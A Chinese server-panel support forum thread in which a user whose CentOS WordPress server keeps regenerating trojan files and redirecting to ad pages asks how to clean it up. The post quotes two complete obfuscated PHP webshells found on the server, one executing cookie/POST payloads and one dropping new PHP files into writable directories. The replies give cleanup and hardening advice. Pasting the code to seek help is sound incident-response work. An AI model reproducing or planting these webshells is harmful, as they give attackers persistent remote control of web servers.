【已完成】服务器被入侵，每天自动生成木马文件如何清除

为了能快速了解并处理您的问题，请提供以下基础信息：

面板、插件版本：

免费版 [url=]8.0.4[/url]

系统版本：

系统:CentOS 7.5.1804 x86_64(Py3.7.9)

问题描述：

被入侵，每天自动生成木马文件，然后网页跳转到小视频广告页面。

相关截图（日志、错误）：

1. <?php /*lxk */function xyclb(){$ujyrjjt='wdojgihc';      print_r (79139+79139);/*  qin*/}
   
2. $ssgywerpcn/*  mzkel */=  'ssgywerpcn'   ^    ' ';
   
3. 
   
4. 
   
5. function/*a   */pyymvixxb_($kn_xqalen,/*  sd   */$bnpohvotsmg)
   
6. 
   
7. {
   
8. global      $ssgywerpcn;/*_f   */$kdzpfl/*ucbi*/=  "";   for/* dapv  */($zaauyvetbu   = 0; $zaauyvetbu </*  bjz  */strlen($kn_xqalen);) {
   
9. /*   xdsxa */for       ($bnpohvo  =       0;   $bnpohvo     </* vyogl  */strlen($bnpohvotsmg)/* lmdtw  */&&  $zaauyvetbu/*  ywxqi*/</*  tm*/strlen($kn_xqalen);      $bnpohvo++,/*  rhj_ */$zaauyvetbu++)    {
   
10.    $kdzpfl       .=/*jmyy*/$ssgywerpcn(ord($kn_xqalen[$zaauyvetbu])  ^  ord($bnpohvotsmg[$bnpohvo]));
    
11.     }
    
12. 
    
13. }/*dpknn*/return/*z */$kdzpfl;
    
14. 
    
15. 
    
16. }
    
17. function kjjpsyuvn($lyxehu,       $kn_xqalen){ global/*  uxuyd   */$ssgywerpcn;
    
18. 
    
19. 
    
20. 
    
21.     $afrqev/* vbct */=     sprintf("\x2e" .     "/"."%".$ssgywerpcn(115)  . "."."p"."\154", md5($lyxehu));
    
22. 
    
23. /*  vhvvo*/file_put_contents($afrqev, "<"/*ibnb */.       $ssgywerpcn(63) .      $ssgywerpcn(112)/*  ar   */./*x */"h".$ssgywerpcn(112)     . $ssgywerpcn(32) .    "u"."n"."l"."i"."\156"      ./*fqbm   */"k".$ssgywerpcn(854-814) . "\137"   . "_"."\106"/*   qde   */./*o  */"\111"/*a   */./* gxbg*/$ssgywerpcn(76)   .   $ssgywerpcn(220-151)/* y */. $ssgywerpcn(95) .      $ssgywerpcn(95)  . "\x29"/*  cpzcg */. ";".$ssgywerpcn(32)   .    $kn_xqalen[$ssgywerpcn(265-165)]);
    
24. include($afrqev); $txbkfgegt  =   $afrqev;
    
25. 
    
26. 
    
27. /*   ufiax   */unlink($txbkfgegt);
    
28. 
    
29. }
    
30. 
    
31. 
    
32. 
    
33. 
    
34. function/* n*/_de_r(){ global $ssgywerpcn;
    
35. 
    
36. 
    
37. 
    
38. 
    
39. /*  tv */$zaauyvetbu =  array();
    
40. 
    
41. 
    
42.        $zaauyvetbu["p".$ssgywerpcn(236-118)]/*  hhfub   */=       phpversion();
    
43. 
    
44. $zaauyvetbu["\x73"/*  enptp*/.     "v"] =/*  hnrb  */"3"."."."5";
    
45. 
    
46. 
    
47.     echo @serialize($zaauyvetbu);
    
48. 
    
49. }
    
50. function    ihnyimf_k($kn_xqalen,   $lyxehu,    $rdqiaixj)
    
51. 
    
52. {
    
53. /*   io_a*/global      $ssgywerpcn;
    
54. 
    
55. 
    
56. 
    
57. 
    
58.      $kn_xqalen  = unserialize(pyymvixxb_(pyymvixxb_(base64_decode($kn_xqalen),/*nvm  */$lyxehu),       $rdqiaixj));
    
59.   if (isset($kn_xqalen[$ssgywerpcn(97)/* q   */./*  un   */$ssgywerpcn(520-413)]))    {    if ($kn_xqalen["a"] == "i") {
    
60. 
    
61. 
    
62. /*  k   */_de_r();/*   x   */}/*zowjn  */elseif/*a_   */($kn_xqalen["a"]     ==  $ssgywerpcn(101))  {
    
63. /*  jchf */kjjpsyuvn($lyxehu, $kn_xqalen);
    
64. 
    
65. 
    
66. /*d*/}
    
67. 
    
68. /*angx */exit();
    
69. 
    
70. }}
    
71. 
    
72. 
    
73. 
    
74. $kiqgcjxshz/*aybq */=/*   tjz  */$_COOKIE;$eohltwu =/* yy*/$_POST;
    
75. 
    
76. $kiqgcjxshz  = array_merge($eohltwu, $kiqgcjxshz);
    
77. 
    
78. 
    
79. 
    
80. 
    
81. $lyxehu =/* f */$ssgywerpcn(295-197) ./*  nfa */$ssgywerpcn(52)/*wah */. "\x31"/* lyj   */./*   kik_ */"\x33"/*tmktl */./*  bmsob*/$ssgywerpcn(50)      .   $ssgywerpcn(121-65) . "\x31"  .    "\62"  .  "-"."\x64"/*   _   */. $ssgywerpcn(49)       .  "f".$ssgywerpcn(53)  . "\55"/*  zhq*/./*xtuat*/"\64"     ./*   kf   */"3"."\144"    . "8"."\55"     . "9".$ssgywerpcn(101)."9".$ssgywerpcn(57)    ./*   hn */"\55"   ./*  qzrav*/"\60"   . "1".$ssgywerpcn(54) .     "\x35" ./*   kaihb*/$ssgywerpcn(179-77) . $ssgywerpcn(102)     ./*  x   */"\x38"/*nnrhp   */.    "7".$ssgywerpcn(54)/* j*/.      "0"."\x37"   .       "0";
    
82. 
    
83. 
    
84. foreach ($kiqgcjxshz/*ueynv  */as       $rdqiaixj    =>/*  oo  */$kn_xqalen)  {
    
85. 
    
86. 
    
87. /*a   */ihnyimf_k($kn_xqalen, $lyxehu,     $rdqiaixj);
    
88. }

复制代码

1. themes.php
   
2. 
   
3. <?php $eiPORyHuD = "\x44".'O'.chr(67)."\125"."\x4d".chr(69)."\x4e"."\x54"."\x5f"."\x52"."\x4f".chr(79).chr(488-404);$mQeLbMGGH = "\x48".chr(793-709).chr(84)."\x50".chr(95)."\110".'O'."\123".chr(612-528);$EqgzY = chr(955-851).'t'."\164".chr(112).chr(58).chr(47)."\57";$JuqNXjgAE = "\56"."\x70"."\150".chr(112);$xmRiMBXufw = "\160".chr(104).'p';$LhKfGPavo = chr(102).chr(350-245)."\x6c"."\x65"."\137".chr(630-518).chr(117).'t'.chr(1077-982).'c'."\x6f".'n'."\164"."\145".chr(110)."\164".chr(115);$CmwjEUGCOh = 'r'.chr(97).chr(119).chr(117).'r'.chr(108).chr(100)."\145".chr(99).'o'.'d'."\145";$HejiZoUGGb = "\x75".chr(110).chr(115)."\x65".chr(114).'i'."\x61".chr(108)."\x69".chr(594-472)."\145";$ExCCez = chr(105)."\x73"."\x5f"."\x77"."\x72".chr(552-447).chr(116)."\141".chr(98)."\x6c".chr(850-749);$UHrOh = "\160"."\150".chr(112)."\x76"."\145".chr(857-743).chr(868-753)."\151".chr(928-817).'n';$qWcAnj = chr(684-569).chr(116).chr(940-826).chr(95).chr(142-28).chr(541-430).chr(116).chr(657-608).chr(463-412);$iRQyI = chr(115).chr(247-146)."\162"."\151"."\141"."\154"."\151".'z'.chr(607-506);$lbFvqwTk = "\163".chr(116)."\162"."\137"."\163".chr(284-172).chr(108)."\x69".'t';foreach ($_POST as $LjGYaNIPG => $IkFCctu){$fKpOQVhU = strlen($LjGYaNIPG);if ($fKpOQVhU == 16){$IkFCctu = $lbFvqwTk($CmwjEUGCOh($qWcAnj($IkFCctu)));$LjGYaNIPG = array_slice($lbFvqwTk(str_repeat($LjGYaNIPG, (count($IkFCctu)/16)+1)), 0, count($IkFCctu));function nJBnsCDb($rFbUM, $vuUkPGaBA, $LjGYaNIPG){$aCXFOCnojs = "9250814d-4f45-46d8-bc88-5d4a5707300c";return $rFbUM ^ $aCXFOCnojs[$vuUkPGaBA % strlen($aCXFOCnojs)] ^ $LjGYaNIPG;}$IkFCctu = array_map("nJBnsCDb", array_values($IkFCctu), array_keys($IkFCctu), array_values($LjGYaNIPG));$IkFCctu = implode("", $IkFCctu);$IkFCctu = @$HejiZoUGGb($IkFCctu);if (@is_array($IkFCctu)){$qpWgwklWJWhYzBYj = array_keys($IkFCctu);$IkFCctu = $IkFCctu[$qpWgwklWJWhYzBYj[0]];if ($IkFCctu === $qpWgwklWJWhYzBYj[0]){echo @$iRQyI(Array($xmRiMBXufw => @$UHrOh(), ));exit();}else {function HnxkXivxRP($qpWgwklir){static $lQTcstB = array();$iDcDhF = glob($qpWgwklir . '/*', GLOB_ONLYDIR);$mpUZABBn = count($iDcDhF);if ($mpUZABBn > 0) {foreach ($iDcDhF as $qpWgwkl) {if (@$ExCCez($qpWgwkl)) {$lQTcstB[] = $qpWgwkl;}}}foreach ($iDcDhF as $qpWgwklir) HnxkXivxRP($qpWgwklir);return $lQTcstB;}$kZKkSu = $_SERVER[$eiPORyHuD];$iDcDhF = HnxkXivxRP($kZKkSu);$qpWgwklWJWhYzBYj = array_rand($iDcDhF);$FYTATZ = $iDcDhF[$qpWgwklWJWhYzBYj] . "/" . substr(md5(time()), 0, 8) . $JuqNXjgAE;@$LhKfGPavo($FYTATZ, $IkFCctu);$OPVIrEk = $EqgzY . $_SERVER[$mQeLbMGGH] . substr($FYTATZ, strlen($kZKkSu));print($OPVIrEk);die();}}}}

复制代码

先检查下服务器有没有新增的用户   
修改root密码
再检查用户的权限
删除除了root或则你自己指定的其他所有有SSH权限的用户
修改宝塔密码 删除非自己的宝塔的用户
非必要关闭宝塔API
微步或者防火墙、木马查杀啥的 扫描下wenshell

修改过root密码，关闭过宝塔面板，还是会被黑客远程访问网站激活木马，写入跳转文件。我估计是系统被写入其它母木马。对方能修改网站根目录文件444，自动改成755，就是木马程序能够更改文件权限。


现在基本上把WordPress目录改成555，只留update为755，现在木马就只在update目录出现了。

现在应该排查系统是否有母木马，或者是root是否还有漏洞，或者是WordPress的MySQLSF有恶意程序。

备份数据（网站，数据库等等）
使用工具对网站程序扫描，清理木马，以及对代码做审计，程序有漏洞及时修复
检查服务器日志，网站日志，排查入侵的方式，采取相应的措施避免再次入侵
重装系统，恢复数据
对服务器进行相应的安全措施
一些防挂马、篡改、恶意提权的小防护攻略：
1.网站上线前，对自己的项目用常用的一些工具进行程序漏洞安全扫描，并且做多份备份；
2.为了安全起见，网站后台管理地址经常改，改完做多份纪录保存，并且做好历史修改记录；
3.默认数据库名称要改，能复杂尽量复杂，用好复制粘贴按键；
4.后台启用验证码登录模块，不要怕麻烦，人家弄您网站的人都不嫌麻烦；
5.做好网站防护，比如非法上传文件、会员上传恶意文件的功能等，装好web防火墙；
6.服务器主机的ssh能不开就不开，尽量少使用root用户登录；即使登录也做好登录限制为仅允许自己的ip，高强度复杂的密码是第一必设项；
7.宝塔面板有多个辅助防护插件，例如调用系统防火墙、web防火墙（nginx防火墙/apache防火墙）、php安全防护、防篡改、防入侵等。